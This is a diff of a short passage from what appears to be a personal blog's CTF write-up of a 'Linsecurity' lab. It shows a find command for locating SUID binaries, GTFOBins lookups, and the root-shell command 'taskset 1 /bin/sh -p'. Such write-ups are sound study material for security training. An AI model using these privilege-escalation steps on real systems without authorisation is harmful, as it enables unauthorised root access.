szorfein/szorfein.github.io/_posts/2018-10-28-CTF-Linsecuriry.md

 A look at [g0tm1lk](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) to find a command to search suid file:

-     $ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
+     $ find / -perm -u=s -type f -exec ls -ld {} \; 2>/dev/null

-Compare with [gtfobin](https://gtfobins.github.io), theses programs can be exploit:

      -rwsr-x--- 1 root itservices 18552 Apr 10  2018 /usr/bin/xxd

-A group itservices...
+     -rwsr-sr-x 1 root root 30800 May 16 10:41 /usr/bin/taskset

+Search each commands on [gtfobin](https://gtfobins.github.io), only 2 will serve us.

+First `taskset`:

+    $ taskset 1 /bin/sh -p

+And `xxd` is owned by a group `itservices`...
 Which user is part of it.

     $ grep itservices /etc/group
     itservices:x:1007:susan